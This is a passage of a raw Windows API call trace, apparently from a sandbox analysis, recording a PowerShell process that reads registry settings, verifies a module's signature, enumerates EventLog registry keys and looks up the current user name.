RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f2d8, lpData=0x50ddfc8, lpcbData=0x724f2d4*=0x56 | out: lpType=0x724f2d8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x724f2d4*=0x56) returned 0x0 [0127.369] RegCloseKey (hKey=0x35c) returned 0x0 [0127.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0127.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0127.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f274) returned 1 [0127.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x724f2f0 | out: lpFileInformation=0x724f2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0127.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f270) returned 1 [0127.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0127.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0127.381] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f280 | out: phkResult=0x724f280*=0x35c) returned 0x0 [0127.381] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f2a0, lpData=0x0, lpcbData=0x724f29c*=0x0 | out: lpType=0x724f2a0*=0x1, lpData=0x0, lpcbData=0x724f29c*=0x56) returned 0x0 [0127.381] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f2a0, lpData=0x50de684, lpcbData=0x724f29c*=0x56 | out: lpType=0x724f2a0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x724f29c*=0x56) returned 0x0 [0127.381] RegCloseKey (hKey=0x35c) returned 0x0 [0127.544] CoTaskMemAlloc (cb=0x20c) returned 0x133d000 [0127.546] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x133d000 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0127.641] CoTaskMemFree (pv=0x133d000) [0127.641] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0127.641] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0127.642] CoTaskMemAlloc (cb=0x20c) returned 0x133d000 [0127.642] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x133d000 | out: pszPath="C:\\WINDOWS\\SysWOW64") returned 0x0 [0127.643] CoTaskMemFree (pv=0x133d000) [0127.643] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0127.643] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64", nBufferLength=0x14, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64", lpFilePart=0x0) returned 0x13 [0127.643] CoTaskMemAlloc (cb=0x20c) returned 0x133d000 [0127.643] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x133d000 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0127.645] CoTaskMemFree (pv=0x133d000) [0127.645] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0127.645] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0127.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0127.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0127.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f1e8) returned 1 [0127.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x724f264 | out: lpFileInformation=0x724f264*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780)) returned 1 [0127.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f1e4) returned 1 [0127.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0127.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0127.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x724f1bc) returned 1 [0127.654] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3e8 [0127.654] GetFileType (hFile=0x3e8) returned 0x1 [0127.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x724f1b8) returned 1 [0127.654] GetFileType (hFile=0x3e8) returned 0x1 [0127.747] WTGetSignatureInfo () returned 0x0 [0131.610] CertDuplicateCertificateContext (pCertContext=0x75e3cb8) returned 0x75e3cb8 [0131.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f220 | out: phkResult=0x724f220*=0x644) returned 0x0 [0131.937] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f240, lpData=0x0, lpcbData=0x724f23c*=0x0 | out: lpType=0x724f240*=0x1, lpData=0x0, lpcbData=0x724f23c*=0x56) returned 0x0 [0131.937] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x724f240, lpData=0x5128c64, lpcbData=0x724f23c*=0x56 | out: lpType=0x724f240*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x724f23c*=0x56) returned 0x0 [0131.938] RegCloseKey (hKey=0x644) returned 0x0 [0131.938] CoTaskMemAlloc (cb=0x10) returned 0x762a160 [0131.938] CoTaskMemAlloc (cb=0x30) returned 0x760adf0 [0131.939] WinVerifyTrust () returned 0x0 [0131.942] CoTaskMemFree (pv=0x760adf0) [0131.942] CoTaskMemFree (pv=0x762a160) [0131.943] CertFreeCertificateContext (pCertContext=0x75e3cb8) returned 1 [0131.944] CloseHandle (hObject=0x3e8) returned 1 [0131.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0132.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.163] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.038] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.489] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.209] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.552] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.803] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.996] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.059] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.796] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.837] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.541] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x724e930, nSize=0x80 | out: lpBuffer="က永က永") returned 0x0 [0145.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x724e7fc, nSize=0x80 | out: lpBuffer="ܤ籶玪呪꽨က永က永") returned 0x0 [0145.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x6bc) returned 0x0 [0145.860] RegQueryInfoKeyW (in: hKey=0x6bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x724f14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x724f14c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f148*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x0, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x1, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x2, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x3, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x4, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x5, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x6, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.860] RegEnumKeyExW (in: hKey=0x6bc, dwIndex=0x7, lpName=0x52a4904, lpcchName=0x724f168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x724f168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.861] RegCloseKey (hKey=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.861] RegCloseKey (hKey=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.861] RegCloseKey (hKey=0x644) returned 0x0 [0145.861] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.862] RegCloseKey (hKey=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.862] RegCloseKey (hKey=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.862] RegCloseKey (hKey=0x644) returned 0x0 [0145.862] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.863] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x0) returned 0x2 [0145.863] RegCloseKey (hKey=0x644) returned 0x0 [0145.863] RegOpenKeyExW (in: hKey=0x6bc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x644) returned 0x0 [0145.863] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f128 | out: phkResult=0x724f128*=0x6a4) returned 0x0 [0145.863] RegCloseKey (hKey=0x6a4) returned 0x0 [0145.863] RegCloseKey (hKey=0x6bc) returned 0x0 [0145.864] RegCloseKey (hKey=0x644) returned 0x0 [0145.998] CoTaskMemAlloc (cb=0x804) returned 0x12b0ae0 [0145.998] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x12b0ae0, nSize=0x724f220 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x724f220) returned 0x1 [0146.000] CoTaskMemFree (pv=0x12b0ae0) [0146.001] GetUserNameW (in: lpBuffer=0x724efb4, pcbBuffer=0x724f22c | out: lpBuffer="FD1HVy", pcbBuffer=0x724f22c) returned 1 [0146.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0d0 | out: phkResult=0x724f0d0*=0x64c) returned 0x0 [0146.847] RegQueryInfoKeyW (in: hKey=0x64c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x724f120, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f11c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x724f120*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x724f11c*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x0, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] CoTaskMemFree (pv=0x0) [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x1, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] CoTaskMemFree (pv=0x0) [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x2, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] CoTaskMemFree (pv=0x0) [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x3, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] CoTaskMemFree (pv=0x0) [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x4, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.847] CoTaskMemFree (pv=0x0) [0146.847] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x5, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.848] CoTaskMemFree (pv=0x0) [0146.848] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x6, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.848] CoTaskMemFree (pv=0x0) [0146.848] RegEnumKeyExW (in: hKey=0x64c, dwIndex=0x7, lpName=0x52182dc, lpcchName=0x724f13c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x724f13c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0146.848] CoTaskMemFree (pv=0x0) [0146.848] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.848] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.848] RegCloseKey (hKey=0x288) returned 0x0 [0146.848] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.848] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.848] RegCloseKey (hKey=0x288) returned 0x0 [0146.848] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.849] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.849] RegCloseKey (hKey=0x288) returned 0x0 [0146.849] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.849] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.849] RegCloseKey (hKey=0x288) returned 0x0 [0146.849] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.849] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.850] RegCloseKey (hKey=0x288) returned 0x0 [0146.850] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.850] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.850] RegCloseKey (hKey=0x288) returned 0x0 [0146.850] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x288) returned 0x0 [0146.850] RegOpenKeyExW (in: hKey=0x288, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x724f0fc | out: phkResult=0x724f0fc*=0x0) returned 0x2 [0146.850] RegCloseKey (hKey=0x288) returned 0x0 [0146.850] RegOpenKeyExW (in: 